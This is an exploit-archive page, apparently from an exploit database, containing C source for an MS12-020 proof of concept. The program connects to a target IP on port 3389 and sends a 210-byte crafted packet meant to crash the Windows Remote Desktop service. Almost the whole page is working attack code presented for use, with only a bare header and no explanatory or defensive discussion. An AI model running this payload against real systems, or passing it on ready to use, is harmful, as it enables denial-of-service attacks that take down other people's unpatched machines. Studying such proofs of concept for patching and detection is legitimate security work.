MS12-020 DoS PoC (210 byte payload)



EKU-ID: 1680 CVE: OSVDB-ID:
Author: expku Published: 2012-03-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#include "stdio.h"
#include "winsock2.h"
#pragma comment(lib, "ws2_32.lib")

const char hexData[210] =
{
    0x03, 0x00, 0x00, 0x13, 0x0E, 0xE0, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x01, 0x00, 0x08, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x6A, 0x02,
    0xF0, 0x80, 0x7F, 0x65, 0x82, 0x00, 0x5E, 0x04,
    0x01, 0x01, 0x04, 0x01, 0x01, 0x01, 0x01, 0xFF,
    0x30, 0x19, 0x02, 0x01, 0xFF, 0x02, 0x01, 0xFF,
    0x02, 0x01, 0x00, 0x02, 0x01, 0x01, 0x02, 0x01,
    0x00, 0x02, 0x01, 0x01, 0x02, 0x02, 0x00, 0x7C,
    0x02, 0x01, 0x02, 0x30, 0x19, 0x02, 0x01, 0xFF,
    0x02, 0x01, 0xFF, 0x02, 0x01, 0x00, 0x02, 0x01,
    0x01, 0x02, 0x01, 0x00, 0x02, 0x01, 0x01, 0x02,
    0x02, 0x00, 0x7C, 0x02, 0x01, 0x02, 0x30, 0x19,
    0x02, 0x01, 0xFF, 0x02, 0x01, 0xFF, 0x02, 0x01,
    0x00, 0x02, 0x01, 0x01, 0x02, 0x01, 0x00, 0x02,
    0x01, 0x01, 0x02, 0x02, 0x00, 0x7C, 0x02, 0x01,
    0x02, 0x04, 0x82, 0x00, 0x00, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x0C, 0x02, 0xF0, 0x80, 0x38, 0x00, 0x06, 0x03,
    0xF0, 0x03, 0x00, 0x00, 0x09, 0x02, 0xF0, 0x80,
    0x21, 0x80
};

int
main(int argc, char* argv[])
{
    WSADATA wsaData;
    SOCKET hSocket;
    struct sockaddr_in victim;
    int result;
    printf("MS12-020 DoS PoC (210 byte payload)\n");
    printf("by Alex Ionescu (@aionescu)\n");
    printf("based on jduck Ruby PoC and Luigi's MSRC PoC\n");
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    hSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    printf("Created socket 0x%lx\n", hSocket);
    if (hSocket == 0) return;

    victim.sin_family = AF_INET;
    victim.sin_port = htons(3389);
    victim.sin_addr.s_addr = inet_addr(argv[1]);
    printf("Connecting to %s...\n", argv[1]);

    result = connect(hSocket, (SOCKADDR*)&victim, sizeof(victim));
    if (result != 0) return;

    printf("Sending payload of 0x%lx bytes\n", sizeof(hexData));
    result = send(hSocket, hexData, sizeof(hexData), 0);
    printf("Sent 0x%lx bytes to server\n", result);

    closesocket(hSocket);
    return 0;
}